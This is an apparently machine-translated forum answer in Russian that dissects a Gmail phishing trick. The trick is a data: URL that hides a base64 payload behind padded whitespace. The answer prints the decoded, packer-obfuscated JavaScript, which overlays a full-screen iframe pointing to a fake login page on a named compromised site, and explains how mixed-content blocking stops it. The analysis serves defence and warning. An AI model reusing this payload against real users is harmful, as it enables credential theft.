Давайте разберем атаку, насколько мы можем:
это URL, начиная от с основной ссылки Gmail для входа, который устанавливает несколько переменных запроса для автоматического входа в систему, если это возможно.
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
Это сопровождается большим количеством пустых пространств, предназначенных для скрытия вредоносного из поля зрения в адресной строке браузера.
%20%20%20%20%20%20%20%20%20%20%20%
(и т.д.)
теперь следует полезной нагрузки для жертвы. он закодирован base64.
, когда мы его расшифровать, это выглядит следующим образом:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
это, является зло, затемненный JavaScript. не выполняйте его.
Ответ martinstoeckli содержит расширенную версию этого скрипта.
он устанавливает заголовок вашей текущей вкладки, чтобы отобразить страницу «вы были выписаны» из gMail и изменяет страницу, добавив заполняющий экран iframe без границ.
iFrame указывает на (что-то похожее) на взломанный сайт Wordpress, содержащий поддельную страницу входа в Gmail. При вводе учетных данных на поддельную страницу, размещенную на bluevoicepgh.club
(кто-то может захотеть уведомить этих людей о том, что их веб-сайт на WordPress, вероятно, скомпрометирован), вы затем перенаправляетесь на страницу gmail, которая молчала вас в фоновом режиме. это происходит независимо от того, были ли правильные учетные данные, введенные вами на фальшивую страницу входа в систему, или нет.
Если вы действительно ввели действительные учетные данные на эту страницу, не сообщается, куда бы оно пошло, если только вы не сможете посмотреть на сценарий, стоящий за ним.
Имейте в виду, что (к счастью) в его нынешней форме атака не будет работать должным образом, поскольку на странице входа в Google используется https (и применяется использование https). Как хром напоминает нам, когда исполняется скрипт:
Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.
Просто для полноты декодированного скрипт часть: http://pastebin.com/0ZK3s2L1 – Andreas